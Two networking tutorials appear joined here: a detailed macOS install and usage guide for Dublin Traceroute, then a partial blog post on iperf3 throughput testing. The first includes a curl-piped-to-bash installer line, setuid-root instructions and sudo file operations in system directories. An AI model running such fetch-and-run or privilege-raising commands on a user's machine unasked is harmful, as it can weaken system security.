Dublin Traceroute on macOS: A Complete Installation and Usage Guide

Modern networks are far more complex than the simple point to point paths of the early internet. Equal Cost Multi Path (ECMP) routing, carrier grade NAT, and load balancing mean that packets from your machine to a destination might traverse entirely different network paths depending on flow hashing algorithms. Traditional traceroute tools simply cannot handle this complexity, often producing misleading or incomplete results. Dublin Traceroute solves this problem.

This guide provides a detailed walkthrough of installing Dublin Traceroute on macOS, addressing the common Xcode compatibility issues that plague the build process, and exploring the tool’s advanced capabilities for network path analysis.

1. Understanding Dublin Traceroute

1.1 What is Dublin Traceroute?

Dublin Traceroute is a NAT aware multipath tracerouting tool developed by Andrea Barberio. Unlike traditional traceroute utilities, it uses techniques pioneered by Paris traceroute to enumerate all possible network paths in ECMP environments, while adding novel NAT detection capabilities.

The tool addresses a fundamental limitation of classic traceroute. When multiple equal cost paths exist between source and destination, traditional traceroute cannot distinguish which path each packet belongs to, potentially showing you a composite “ghost path” that no real packet actually traverses.

1.2 How ECMP Breaks Traditional Traceroute

Consider a network topology where packets from host A to host F can take two paths:

A → B → D → F
A → C → E → F

Traditional traceroute sends packets with incrementing TTL values and records the ICMP Time Exceeded responses. However, because ECMP routers hash packets to determine their path (typically based on source IP, destination IP, source port, destination port, and protocol), successive traceroute packets may be routed differently.

The result? Traditional traceroute might show you something like A → B → E → F, a path that doesn’t actually exist in your network. This phantom path combines hops from two different real paths, making network troubleshooting extremely difficult.
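
To see why, consider a toy flow hash (illustrative Python only; real routers use vendor specific hardware hashes). The 5-tuple selects the path, and because classic traceroute varies the destination port on each probe, successive probes can land on different paths:

import hashlib

def ecmp_next_hop(src_ip, dst_ip, sport, dport, proto, n_paths):
    # Toy hash over the 5-tuple; the result picks one of the equal cost paths
    key = f"{src_ip}|{dst_ip}|{sport}|{dport}|{proto}".encode()
    return int.from_bytes(hashlib.sha256(key).digest()[:4], "big") % n_paths

# Classic traceroute increments the destination port per probe, so each
# probe may hash onto a different path:
for dport in range(33434, 33440):
    print(dport, "-> path", ecmp_next_hop("192.0.2.1", "8.8.8.8", 12345, dport, 17, 2))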

1.3 The Paris Traceroute Innovation

The Paris traceroute team invented a technique that keeps the flow identifier constant across all probe packets. By maintaining consistent values for the fields that routers use for ECMP hashing, all probes follow the same path. Dublin Traceroute implements this technique and extends it.
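
A minimal sketch of the idea using scapy (my illustration; Dublin Traceroute itself is implemented in C++ and Go): keep the entire 5-tuple fixed and vary only the TTL, so ECMP hashing assigns every probe to the same path.

from scapy.all import IP, UDP, sr1  # requires scapy and root privileges

TARGET = "8.8.8.8"

# Fixed 5-tuple -> fixed ECMP hash -> every probe follows the same path
for ttl in range(1, 11):
    probe = IP(dst=TARGET, ttl=ttl) / UDP(sport=12345, dport=33434)
    reply = sr1(probe, timeout=2, verbose=False)
    print(f"{ttl:2} {reply.src if reply is not None else '*'}")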

1.4 Dublin Traceroute’s NAT Detection

Dublin Traceroute introduces a unique NAT detection algorithm. It forges a custom IP ID in outgoing probe packets and tracks these identifiers in ICMP response packets. When a response references an outgoing packet with different source/destination addresses or ports than what was sent, this indicates NAT translation occurred at that hop.

For IPv6, where there is no IP ID field, Dublin Traceroute uses the payload length field to achieve the same tracking capability.
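
A sketch of the detection logic, again with scapy (a hypothetical illustration, not the tool’s actual code): forge a known IP ID, then compare the packet quoted inside the ICMP Time Exceeded response against what was sent.

from scapy.all import IP, UDP, IPerror, UDPerror, sr1

probe = IP(dst="8.8.8.8", ttl=3, id=0xBEEF) / UDP(sport=12345, dport=33434)
reply = sr1(probe, timeout=2, verbose=False)

if reply is not None and reply.haslayer(IPerror):
    quoted = reply[IPerror]      # our probe, as quoted back by the router
    if quoted.id == 0xBEEF:      # the forged IP ID ties the reply to this probe
        # If the quoted addresses/ports differ from what we sent,
        # a NAT rewrote the packet before this hop.
        nat_seen = (quoted.src != probe[IP].src) or (
            reply.haslayer(UDPerror) and reply[UDPerror].sport != 12345)
        print("NAT detected" if nat_seen else "no NAT detected")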

2. Prerequisites and System Requirements

Before installing Dublin Traceroute, ensure your system meets these requirements:

2.1 macOS Version

Dublin Traceroute builds on macOS, though the maintainers note that macOS “breaks at every major release”. Currently supported versions include macOS Monterey, Ventura, Sonoma, and Sequoia. Apple Silicon (M1/M2/M3/M4) Macs work correctly with Homebrew’s ARM native builds.

2.2 Xcode Command Line Tools

The Xcode Command Line Tools are mandatory. Verify your installation:

# Check if CLT is installed
xcode-select -p

Expected output for CLT only:

/Library/Developer/CommandLineTools

Expected output if full Xcode is installed:

/Applications/Xcode.app/Contents/Developer

Check the installed version:

pkgutil --pkg-info=com.apple.pkg.CLTools_Executables

Output example:

package-id: com.apple.pkg.CLTools_Executables
version: 16.0.0
volume: /
location: /
install-time: 1699012345

2.3 Homebrew

Homebrew is the recommended package manager for installing dependencies. Verify or install:

# Check if Homebrew is installed
which brew

# If not installed, install it
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

For Apple Silicon Macs, ensure the Homebrew path is in your shell configuration:

echo 'eval "$(/opt/homebrew/bin/brew shellenv)"' >> ~/.zprofile
source ~/.zprofile

3. Installing Xcode Command Line Tools

3.1 Fresh Installation

If you don’t have the Command Line Tools installed:

xcode-select --install

A dialog will appear prompting you to install. Click “Install” and wait for the download to complete (typically 1 to 2 GB).

3.2 Updating Existing Installation

After a macOS upgrade, your Command Line Tools may be outdated. Update via Software Update:

softwareupdate --list

Look for entries like Command Line Tools for Xcode-XX.X and install:

softwareupdate --install "Command Line Tools for Xcode-16.0"

Alternatively, download directly from Apple Developer:

  1. Visit https://developer.apple.com/download/more/
  2. Sign in with your Apple ID
  3. Search for “Command Line Tools”
  4. Download the version matching your macOS

3.3 Resolving Version Conflicts

A common issue occurs when both full Xcode and Command Line Tools are installed with mismatched versions. Check which is active:

xcode-select -p

If it points to Xcode.app but you want to use standalone CLT:

sudo xcode-select --switch /Library/Developer/CommandLineTools

To switch back to Xcode:

sudo xcode-select --switch /Applications/Xcode.app/Contents/Developer

3.4 The Xcode 26.0 Homebrew Bug

If you see an error like:

Warning: Your Xcode (16.1) at /Applications/Xcode.app is too outdated.
Please update to Xcode 26.0 (or delete it).

This is a known Homebrew bug on macOS Tahoe betas where placeholder version mappings reference non existent Xcode versions. The workaround:

# Force Homebrew to use the CLT instead
sudo xcode-select --switch /Library/Developer/CommandLineTools

# Or ignore the warning if builds succeed
export HOMEBREW_NO_INSTALLED_DEPENDENTS_CHECK=1

3.5 Complete Reinstallation

For persistent issues, perform a clean reinstall:

# Remove existing CLT
sudo rm -rf /Library/Developer/CommandLineTools

# Reinstall
xcode-select --install

After installation, verify the compiler works:

clang --version

Expected output:

Apple clang version 16.0.0 (clang-1600.0.26.3)
Target: arm64-apple-darwin24.0.0
Thread model: posix
InstalledDir: /Library/Developer/CommandLineTools/usr/bin

4. Installing Dependencies

Dublin Traceroute requires several libraries that must be installed before building.

4.1 Core Dependencies

brew install cmake
brew install pkg-config
brew install libtins
brew install jsoncpp
brew install libpcap

Verify the installations:

brew list libtins
brew list jsoncpp

4.2 Handling the jsoncpp CMake Discovery Issue

A common build failure occurs when CMake cannot find jsoncpp even though it’s installed:

CMake Error at /usr/local/Cellar/cmake/3.XX.X/share/cmake/Modules/FindPkgConfig.cmake:696 (message):
  None of the required 'jsoncpp' found

This happens because jsoncpp’s pkg-config file may not be in the expected location. Fix this by setting the PKG_CONFIG_PATH:

# For Intel Macs
export PKG_CONFIG_PATH="/usr/local/lib/pkgconfig:$PKG_CONFIG_PATH"

# For Apple Silicon Macs
export PKG_CONFIG_PATH="/opt/homebrew/lib/pkgconfig:$PKG_CONFIG_PATH"

Add this to your shell profile for persistence:

echo 'export PKG_CONFIG_PATH="/opt/homebrew/lib/pkgconfig:$PKG_CONFIG_PATH"' >> ~/.zshrc
source ~/.zshrc

4.3 Dependencies for Python Bindings and Visualization

For the full feature set including graphical output:

brew install graphviz
brew install python@3.11
pip3 install pygraphviz pandas matplotlib tabulate

If pygraphviz fails to install, you need to specify the graphviz paths:

export CFLAGS="-I $(brew --prefix graphviz)/include"
export LDFLAGS="-L $(brew --prefix graphviz)/lib"

pip3 install pygraphviz

Alternatively, use the global option syntax:

pip3 install \
    --config-settings="--global-option=build_ext" \
    --config-settings="--global-option=-I$(brew --prefix graphviz)/include/" \
    --config-settings="--global-option=-L$(brew --prefix graphviz)/lib/" \
    pygraphviz

5. Installing Dublin Traceroute

5.1 Method 1: Homebrew Formula (Recommended)

Dublin Traceroute provides a Homebrew formula, though it’s not in the official repository:

# Download the formula
wget https://raw.githubusercontent.com/insomniacslk/dublin-traceroute/master/homebrew/dublin-traceroute.rb

# Install using the local formula
brew install ./dublin-traceroute.rb

If wget is not available:

curl -O https://raw.githubusercontent.com/insomniacslk/dublin-traceroute/master/homebrew/dublin-traceroute.rb
brew install ./dublin-traceroute.rb

5.2 Method 2: Building from Source

For more control over the build process:

# Clone the repository
git clone https://github.com/insomniacslk/dublin-traceroute.git
cd dublin-traceroute

# Create build directory
mkdir build && cd build

# Configure with CMake
cmake .. \
    -DCMAKE_INSTALL_PREFIX=/usr/local \
    -DCMAKE_BUILD_TYPE=Release

# Build
make -j$(sysctl -n hw.ncpu)

# Install
sudo make install

5.3 Troubleshooting Build Failures

libtins Not Found

CMake Error: Could not find libtins

Fix:

# Ensure libtins is properly linked
brew link --force libtins

# Set CMake prefix path
cmake .. -DCMAKE_PREFIX_PATH="$(brew --prefix)"

Missing Headers

fatal error: 'tins/tins.h' file not found

Fix by specifying include paths:

cmake .. \
    -DCMAKE_INCLUDE_PATH="$(brew --prefix libtins)/include" \
    -DCMAKE_LIBRARY_PATH="$(brew --prefix libtins)/lib"

googletest Submodule Warning

-- googletest git submodule is absent. Run `git submodule init && git submodule update` to get it

This is informational only and doesn’t prevent the build. To silence it:

cd dublin-traceroute
git submodule init
git submodule update

5.4 Setting Up Permissions

Dublin Traceroute requires raw socket access. On macOS, this typically means running as root:

sudo dublin-traceroute 8.8.8.8

For convenience, you can set the setuid bit (be sure you understand the security implications):

# Find the installed binary
DTPATH=$(which dublin-traceroute)

# If it's a symlink, get the real path (greadlink comes from Homebrew's coreutils)
DTREAL=$(greadlink -f "$DTPATH")

# Set ownership and setuid
sudo chown root:wheel "$DTREAL"
sudo chmod u+s "$DTREAL"

Note: Homebrew’s security model discourages setuid binaries. The recommended approach is to use sudo explicitly.

6. Installing Python Bindings

The Python bindings provide additional features including visualization and statistical analysis.

6.1 Installation

pip3 install dublintraceroute

If the C++ library isn’t found:

# Ensure the library is in the expected location
# (note: System Integrity Protection blocks writes to /usr/lib on modern
# macOS, so prefer the library path approach below)
sudo cp /usr/local/lib/libdublintraceroute* /usr/lib/

# Or set the library path
export DYLD_LIBRARY_PATH="/usr/local/lib:$DYLD_LIBRARY_PATH"

pip3 install dublintraceroute

6.2 Verification

import dublintraceroute
print(dublintraceroute.__version__)

7. Basic Usage

7.1 Simple Traceroute

sudo dublin-traceroute 8.8.8.8

Output:

Starting dublin-traceroute
Traceroute from 0.0.0.0:12345 to 8.8.8.8:33434~33453 (probing 20 paths, min TTL is 1, max TTL is 30, delay is 10 ms)

== Flow ID 33434 ==
 1   192.168.1.1 (gateway), IP ID: 17503 RTT 2.657 ms ICMP (type=11, code=0) 'TTL expired in transit', NAT ID: 0
 2   10.0.0.1, IP ID: 0 RTT 15.234 ms ICMP (type=11, code=0) 'TTL expired in transit', NAT ID: 0
 3   72.14.215.85, IP ID: 0 RTT 18.891 ms ICMP (type=11, code=0) 'TTL expired in transit', NAT ID: 0
...

7.2 Command Line Options

dublin-traceroute --help
Dublin Traceroute v0.4.2
Written by Andrea Barberio - https://insomniac.slackware.it

Usage:
  dublin-traceroute <target> [options]

Options:
  -h --help                 Show this help
  -v --version              Print version
  -s SRC_PORT --sport=PORT  Source port to send packets from
  -d DST_PORT --dport=PORT  Base destination port
  -n NPATHS --npaths=NUM    Number of paths to probe (default: 20)
  -t MIN_TTL --min-ttl=TTL  Minimum TTL to probe (default: 1)
  -T MAX_TTL --max-ttl=TTL  Maximum TTL to probe (default: 30)
  -D DELAY --delay=MS       Inter-packet delay in milliseconds
  -b --broken-nat           Handle broken NAT configurations
  -N --no-dns               Skip reverse DNS lookups
  -o --output-file=FILE     Output file name (default: trace.json)

7.3 Controlling Path Enumeration

Probe fewer paths for faster results:

sudo dublin-traceroute -n 5 8.8.8.8

Limit TTL range for local network analysis:

sudo dublin-traceroute -t 1 -T 10 192.168.1.1

7.4 JSON Output

Dublin Traceroute writes structured results to a JSON file (trace.json by default):

sudo dublin-traceroute -o google_trace.json 8.8.8.8
cat google_trace.json | python3 -m json.tool | head -50

Example JSON structure:

{
  "flows": {
    "33434": {
      "hops": [
        {
          "sent": {
            "timestamp": "2024-01-15T10:30:00.123456",
            "ip": {
              "src": "192.168.1.100",
              "dst": "8.8.8.8",
              "id": 12345
            },
            "udp": {
              "sport": 12345,
              "dport": 33434
            }
          },
          "received": {
            "timestamp": "2024-01-15T10:30:00.125789",
            "ip": {
              "src": "192.168.1.1",
              "id": 54321
            },
            "icmp": {
              "type": 11,
              "code": 0,
              "description": "TTL expired in transit"
            }
          },
          "rtt_usec": 2333,
          "nat_id": 0
        }
      ]
    }
  }
}
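
Given that structure, extracting per hop responders and RTTs takes only a few lines. A minimal sketch, assuming the file shown above:

import json

with open("google_trace.json") as f:
    trace = json.load(f)

for flow_id, flow in trace["flows"].items():
    print(f"Flow {flow_id}:")
    for hop in flow["hops"]:
        src = hop.get("received", {}).get("ip", {}).get("src", "*")
        rtt = hop.get("rtt_usec")
        if rtt is not None:
            print(f"  {src:15} {rtt / 1000:.3f} ms")
        else:
            print(f"  {src:15} no reply")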

8. Advanced Usage and Analysis

8.1 Generating Visual Network Diagrams

Convert the JSON output to a graphical representation:

# Run the traceroute
sudo dublin-traceroute 8.8.8.8

# Generate the graph
python3 scripts/to_graphviz.py trace.json

# View the image
open trace.json.png

The resulting image shows:

  • Each unique hop as an ellipse
  • Arrows indicating packet flow direction
  • RTT times on edges
  • Different colors for different flow paths
  • NAT indicators where detected

8.2 Using Python for Analysis

import dublintraceroute

# Create traceroute object
dt = dublintraceroute.DublinTraceroute(
    dst='8.8.8.8',
    sport=12345,
    dport_base=33434,
    npaths=20,
    min_ttl=1,
    max_ttl=30
)

# Run the traceroute (requires root)
results = dt.traceroute()

# Pretty print the results
results.pretty_print()

Output:

ttl   33436                              33434                              33435
----- ---------------------------------- ---------------------------------- ----------------------------------
1     gateway (2657 usec)                gateway (3081 usec)                gateway (4034 usec)
2     *                                  *                                  *
3     isp-router (33980 usec)            isp-router (35524 usec)            isp-router (41467 usec)
4     core-rtr (44800 usec)              core-rtr (14194 usec)              core-rtr (41489 usec)
5     peer-rtr (43516 usec)              peer-rtr2 (35520 usec)             peer-rtr2 (41924 usec)

8.3 Converting to Pandas DataFrame

import dublintraceroute
import pandas as pd

dt = dublintraceroute.DublinTraceroute('8.8.8.8')
results = dt.traceroute()

# Convert to DataFrame
df = results.to_dataframe()

# Analyze RTT statistics by hop
print(df.groupby('ttl')['rtt_usec'].describe())

# Find the slowest hops
slowest = df.nlargest(5, 'rtt_usec')[['ttl', 'name', 'rtt_usec']]
print(slowest)

8.4 Visualizing RTT Patterns

import dublintraceroute
import matplotlib.pyplot as plt

dt = dublintraceroute.DublinTraceroute('8.8.8.8')
results = dt.traceroute()
df = results.to_dataframe()

# Group by destination port (flow)
group = df.groupby('sent_udp_dport')['rtt_usec']

fig, ax = plt.subplots(figsize=(12, 6))

for label, sdf in group:
    sdf.reset_index(drop=True).plot(ax=ax, label=f'Flow {label}')

ax.set_xlabel('Hop Number')
ax.set_ylabel('RTT (microseconds)')
ax.set_title('RTT by Network Path')
ax.legend(title='Destination Port', loc='upper left')

plt.tight_layout()
plt.savefig('rtt_analysis.png', dpi=150)
plt.show()

8.5 Detecting NAT Traversal

import dublintraceroute
import json

dt = dublintraceroute.DublinTraceroute('8.8.8.8')
results = dt.traceroute()

# Access raw JSON
trace_data = json.loads(results.to_json())

# Find NAT hops
for flow_id, flow_data in trace_data['flows'].items():
    print(f"\nFlow {flow_id}:")
    for hop in flow_data['hops']:
        if hop.get('nat_id', 0) != 0:
            print(f"  TTL {hop['ttl']}: NAT detected (ID: {hop['nat_id']})")
            if 'received' in hop:
                print(f"    Response from: {hop['received']['ip']['src']}")

8.6 Handling Broken NAT Configurations

Some NAT devices don’t properly translate ICMP payloads. Use the broken NAT flag:

sudo dublin-traceroute --broken-nat 8.8.8.8

This mode sends packets with characteristics that allow correlation even when NAT devices mangle the ICMP error payloads.

8.7 Simple Probe Mode

Send single probes without full traceroute enumeration:

sudo python3 -m dublintraceroute probe google.com

Output:

Sending probes to google.com
Source port: 12345, destination port: 33434, num paths: 20, TTL: 64, delay: 10, broken NAT: False

#   target          src port   dst port   rtt (usec)
--- --------------- ---------- ---------- ------------
1   142.250.185.46  12345      33434      15705
2   142.250.185.46  12345      33435      15902
3   142.250.185.46  12345      33436      16127
...

This is useful for quick connectivity tests to verify reachability through multiple paths.

9. Interpreting Results

9.1 Understanding Flow IDs

Each “flow” in Dublin Traceroute output represents a distinct path through the network. The flow ID is derived from the destination port number. With --npaths=20, you’ll see flows numbered 33434 through 33453.
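
In other words, the flow IDs are simply the probed destination ports:

# Base destination port 33434 (the traceroute convention), 20 paths:
dport_base, npaths = 33434, 20
flow_ids = [dport_base + i for i in range(npaths)]
print(flow_ids[0], "...", flow_ids[-1])   # 33434 ... 33453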

9.2 NAT ID Field

The NAT ID indicates detected NAT translations:

  • NAT ID: 0 means no NAT detected at this hop
  • NAT ID: N (where N > 0) indicates the Nth NAT device encountered

9.3 ICMP Codes

Common ICMP responses:

| Type | Code | Meaning |
|------|------|---------|
| 11 | 0 | TTL expired in transit |
| 3 | 0 | Network unreachable |
| 3 | 1 | Host unreachable |
| 3 | 3 | Port unreachable (destination reached) |
| 3 | 13 | Administratively filtered |

9.4 Identifying ECMP Paths

When multiple flows show different hops at the same TTL, you’ve discovered ECMP routing:

== Flow 33434 ==
 3   router-a.isp.net, RTT 25 ms

== Flow 33435 ==
 3   router-b.isp.net, RTT 28 ms

This reveals two distinct paths through the ISP network.

9.5 Recognizing Asymmetric Routing

Different RTT values for the same hop across flows might indicate:

  • Load balancing with different queue depths
  • Asymmetric return paths
  • Different physical path lengths

10. Go Implementation

Dublin Traceroute also has a Go implementation with IPv6 support:

# Install Go if needed
brew install go

# Build the Go version
cd dublin-traceroute/go/dublintraceroute
go build -o dublin-traceroute-go ./cmd/dublin-traceroute

# Run with IPv6 support
sudo ./dublin-traceroute-go -6 2001:4860:4860::8888

The Go implementation provides:

  • IPv4/UDP probes
  • IPv6/UDP probes (not available in C++ version)
  • JSON output compatible with Python visualization tools
  • DOT output for Graphviz

11. Integration Examples

11.1 Automated Network Monitoring Script

#!/bin/bash
# monitor_paths.sh - Periodic path monitoring

TARGETS=("8.8.8.8" "1.1.1.1" "208.67.222.222")
OUTPUT_DIR="/var/log/dublin-traceroute"
INTERVAL=3600  # 1 hour

mkdir -p "$OUTPUT_DIR"

while true; do
    TIMESTAMP=$(date +%Y%m%d_%H%M%S)

    for target in "${TARGETS[@]}"; do
        OUTPUT_FILE="${OUTPUT_DIR}/${target//\./_}_${TIMESTAMP}.json"

        echo "Tracing $target at $(date)"
        sudo dublin-traceroute -n 10 -o "$OUTPUT_FILE" "$target" > /dev/null 2>&1

        # Generate visualization
        python3 /usr/local/share/dublin-traceroute/to_graphviz.py "$OUTPUT_FILE"
    done

    sleep $INTERVAL
done

11.2 Path Comparison Analysis

#!/usr/bin/env python3
"""Compare network paths between two traceroute runs."""

import json
import sys

def load_trace(filename):
    with open(filename) as f:
        return json.load(f)

def extract_paths(trace):
    paths = {}
    for flow_id, flow_data in trace['flows'].items():
        path = []
        for hop in sorted(flow_data['hops'], key=lambda x: x['sent']['ip']['ttl']):
            if 'received' in hop:
                path.append(hop['received']['ip']['src'])
            else:
                path.append('*')
        paths[flow_id] = path
    return paths

def compare_traces(trace1_file, trace2_file):
    trace1 = load_trace(trace1_file)
    trace2 = load_trace(trace2_file)

    paths1 = extract_paths(trace1)
    paths2 = extract_paths(trace2)

    print("Path Comparison Report")
    print("=" * 60)

    all_flows = set(paths1.keys()) | set(paths2.keys())

    for flow in sorted(all_flows, key=int):
        p1 = paths1.get(flow, [])
        p2 = paths2.get(flow, [])

        if p1 == p2:
            print(f"Flow {flow}: IDENTICAL")
        else:
            print(f"Flow {flow}: DIFFERENT")
            max_len = max(len(p1), len(p2))
            for i in range(max_len):
                h1 = p1[i] if i < len(p1) else '-'
                h2 = p2[i] if i < len(p2) else '-'
                marker = '  ' if h1 == h2 else '>>'
                print(f"  {marker} TTL {i+1}: {h1:20} vs {h2}")

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} trace1.json trace2.json")
        sys.exit(1)

    compare_traces(sys.argv[1], sys.argv[2])

11.3 Alerting on Path Changes

#!/usr/bin/env python3
"""Alert when network paths change from baseline."""

import json
import hashlib
import smtplib
from email.mime.text import MIMEText
import subprocess
import sys

BASELINE_FILE = '/etc/dublin-traceroute/baseline.json'
ALERT_EMAIL = 'netops@example.com'

def get_path_hash(trace):
    """Generate a hash of all paths for quick comparison."""
    paths = []
    for flow_id in sorted(trace['flows'].keys(), key=int):
        flow = trace['flows'][flow_id]
        path = []
        for hop in sorted(flow['hops'], key=lambda x: x['sent']['ip']['ttl']):
            if 'received' in hop:
                path.append(hop['received']['ip']['src'])
        paths.append(':'.join(path))

    combined = '|'.join(paths)
    return hashlib.sha256(combined.encode()).hexdigest()

def send_alert(target, old_hash, new_hash, trace_file):
    msg = MIMEText(f"""
Network path change detected!

Target: {target}
Previous hash: {old_hash}
Current hash: {new_hash}
Trace file: {trace_file}

Please investigate the path change.
""")
    msg['Subject'] = f'[ALERT] Network path change to {target}'
    msg['From'] = 'dublin-traceroute@example.com'
    msg['To'] = ALERT_EMAIL

    with smtplib.SMTP('localhost') as s:
        s.send_message(msg)

def main(target):
    # Run traceroute
    trace_file = f'/tmp/trace_{target.replace(".", "_")}.json'
    subprocess.run([
        'sudo', 'dublin-traceroute',
        '-n', '10',
        '-o', trace_file,
        target
    ], capture_output=True)

    # Load results
    with open(trace_file) as f:
        trace = json.load(f)

    current_hash = get_path_hash(trace)

    # Load baseline
    try:
        with open(BASELINE_FILE) as f:
            baseline = json.load(f)
    except FileNotFoundError:
        baseline = {}

    # Compare
    if target in baseline:
        if baseline[target] != current_hash:
            send_alert(target, baseline[target], current_hash, trace_file)
            print(f"ALERT: Path to {target} has changed!")

    # Update baseline
    baseline[target] = current_hash
    with open(BASELINE_FILE, 'w') as f:
        json.dump(baseline, f, indent=2)

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} target")
        sys.exit(1)
    main(sys.argv[1])

12. Troubleshooting Common Issues

12.1 Permission Denied

Error: Could not open raw socket: Permission denied

Solution: Run with sudo or configure setuid as described in section 5.4.

12.2 No Response from Hops

If you see many asterisks (*) in output:

  1. Firewall may be blocking ICMP responses
  2. Rate limiting on intermediate routers
  3. Increase the delay between probes:
sudo dublin-traceroute --delay=50 8.8.8.8

12.3 Library Not Found at Runtime

dyld: Library not loaded: @rpath/libdublintraceroute.dylib

Fix:

# Add library path
export DYLD_LIBRARY_PATH="/usr/local/lib:$DYLD_LIBRARY_PATH"

# Or create a symlink (SIP may block writes to /usr/lib on modern macOS)
sudo ln -s /usr/local/lib/libdublintraceroute.dylib /usr/lib/

12.4 Python Import Error

ImportError: No module named 'dublintraceroute._dublintraceroute'

The C++ library wasn’t found during Python module installation. Rebuild:

# Ensure headers are available
sudo cp -r /usr/local/include/dublintraceroute /usr/include/

# Reinstall Python module
pip3 uninstall dublintraceroute
pip3 install --no-cache-dir dublintraceroute

12.5 Graphviz Generation Fails

pygraphviz.AGraphError: Error processing dot file

Ensure Graphviz binaries are in PATH:

brew link --force graphviz
export PATH="/opt/homebrew/bin:$PATH"

13. Security Considerations

13.1 Raw Socket Requirements

Dublin Traceroute requires raw socket access to forge custom packets. This capability should be restricted:

  • Prefer sudo over setuid binaries
  • Consider using a dedicated user account for network monitoring
  • Audit usage through system logs

13.2 Information Disclosure

Traceroute output reveals internal network topology. Treat results as sensitive:

  • Don’t expose trace data publicly without sanitization
  • Consider internal IP address implications
  • NAT detection can reveal infrastructure details

13.3 Rate Limiting

Aggressive tracerouting can trigger IDS/IPS alerts or rate limiting. Use appropriate delays in production:

sudo dublin-traceroute --delay=100 --npaths=5 target

14. Conclusion

Dublin Traceroute provides essential visibility into modern network paths that traditional traceroute tools simply cannot offer. The combination of ECMP path enumeration and NAT detection makes it invaluable for troubleshooting complex network issues, validating routing policies, and understanding how your traffic actually traverses the internet.

The installation process on macOS, while occasionally complicated by Xcode version mismatches, is straightforward once dependencies are properly configured. The Python bindings extend the tool’s utility with visualization and analytical capabilities that transform raw traceroute data into actionable network intelligence.

For network engineers dealing with multi homed environments, CDN architectures, or simply trying to understand why packets take the paths they do, Dublin Traceroute deserves a place in your diagnostic toolkit.

15. References

  • Dublin Traceroute Official Site: https://dublin-traceroute.net
  • GitHub Repository: https://github.com/insomniacslk/dublin-traceroute
  • Python Bindings: https://github.com/insomniacslk/python-dublin-traceroute
  • Paris Traceroute Background: https://paris-traceroute.net/about
  • Homebrew: https://brew.sh
  • Apple Developer Downloads: https://developer.apple.com/download/more/

iperf3: The Engineer’s Swiss Army Knife for Network Performance Testing

When something is “slow” on a network, opinions arrive before evidence. Storage teams blame the network, network teams blame the application, and application teams blame “the cloud”. ☁️

iperf3 cuts through that noise by giving you hard, repeatable, protocol-level facts about throughput, latency behavior, and packet loss.

This post explains what iperf3 actually measures, how it works, how to install it, and the top 10 use cases every engineer should know, with concrete command examples.

1. What is iperf3 (and what it is not)

iperf3 is a client–server network testing tool that measures:

  • TCP and UDP throughput
  • Packet loss (UDP)
  • Jitter (UDP)
  • Connection behavior under parallel streams
  • Performance over time (interval reporting)

It does not:

  • Measure application performance
  • Replace packet captures
  • Diagnose routing correctness
  • Simulate real application payloads

Think of iperf3 as a controlled load generator, not an application simulator.

2. How iperf3 works (under the hood)

  • One host runs in server mode
  • Another runs as a client
  • The client generates traffic for a defined duration
  • The server measures what it actually receives
  • Results are reported at fixed intervals and as a summary

Start a server

iperf3 -s

Run a client

iperf3 -c <server-ip>

By default:

  • TCP
  • One stream
  • 10 seconds
  • Adaptive window sizing

Everything else is explicit configuration.

3. Installing iperf3

iperf3 is widely available and lightweight. Installation is usually trivial, but version consistency matters when comparing results.

3.1 Linux (Most Distributions)

Debian / Ubuntu

sudo apt update

sudo apt install -y iperf3

During installation you may be asked whether to start iperf3 as a daemon — this is optional and usually unnecessary.

RHEL / Rocky / Alma / CentOS Stream

sudo dnf install -y iperf3

Amazon Linux 2023

sudo dnf install -y iperf3

3.2 macOS (Homebrew)

brew install iperf3

Verify:

iperf3 --version

3.3 Windows

Option 1: Windows Subsystem for Linux (Recommended)

Install iperf3 inside WSL:

sudo apt install -y iperf3

This gives you Linux-consistent behavior and better scripting.

Option 2: Native Windows Binary

  1. Download the official build from the iperf project
  2. Extract iperf3.exe
  3. Run from PowerShell or CMD

iperf3.exe -c <server-ip>

Note: Native Windows builds sometimes show lower throughput due to driver and socket differences.

3.4 Containers (Docker)

Useful for ephemeral testing or CI pipelines.

docker run --rm -it networkstatic/iperf3 -s

Client:

docker run --rm -it networkstatic/iperf3 -c <server-ip>

3.5 Verifying Installation

iperf3 --version

You should see something like:

iperf 3.x (cJSON 1.x)

4. Why iperf3 is still relevant in 2026

Despite SD-WANs, overlays, service meshes, and cloud abstractions:

  • TCP still collapses under packet loss
  • Firewalls still mis-handle long-lived flows
  • VPNs still pin CPUs
  • East–west traffic still surprises people

iperf3 answers the single most important question first:

Can the network actually move data at the speed we think it can?

5. Top 10 iperf3 Use Cases (with Commands)

Use Case 1: Baseline TCP Throughput Between Two Hosts

iperf3 -c 10.0.0.10

Tells you

  • Real TCP throughput
  • Window scaling effectiveness
  • Obvious bottlenecks

Use Case 2: Parallel TCP Streams

iperf3 -c 10.0.0.10 -P 8

Tells you

  • Whether the link scales with concurrency
  • Presence of per-flow shaping

Use Case 3: Sustained Throughput Over Time

iperf3 -c 10.0.0.10 -t 120 -i 1

Tells you

  • Burst behavior
  • Throttling over time

Use Case 4: UDP Packet Loss and Jitter

iperf3 -c 10.0.0.10 -u -b 500M

Tells you

  • Packet loss
  • Jitter
  • True capacity without TCP recovery

Use Case 5: Maximum Loss-Free UDP Rate

iperf3 -c 10.0.0.10 -u -b 100M

iperf3 -c 10.0.0.10 -u -b 300M

iperf3 -c 10.0.0.10 -u -b 600M
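
The goal is to find the highest rate that stays loss free. A small sketch automating the sweep via JSON output (it assumes end.sum.lost_percent in the UDP results, the usual field in recent iperf3 versions; verify against your build):

import json
import subprocess

SERVER = "10.0.0.10"

for rate in ["100M", "300M", "600M"]:
    out = subprocess.run(
        ["iperf3", "-c", SERVER, "-u", "-b", rate, "-J"],
        capture_output=True, text=True, check=True,
    )
    loss = json.loads(out.stdout)["end"]["sum"]["lost_percent"]
    print(f"{rate}: {loss:.2f}% packet loss")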

Use Case 6: Reverse Direction Testing

iperf3 -c 10.0.0.10 -R

Use Case 7: VPN and Tunnel Testing

iperf3 -c 10.8.0.1 -P 4

Use Case 8: Firewall and Load Balancer Timeouts

iperf3 -c 10.0.0.10 -t 300

Use Case 9: NIC Offloads and Jumbo Frames

iperf3 -c 10.0.0.10 -P 4 -l 64K

Use Case 10: CI / Regression Testing (JSON Output)

iperf3 -c 10.0.0.10 -J > result.json
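
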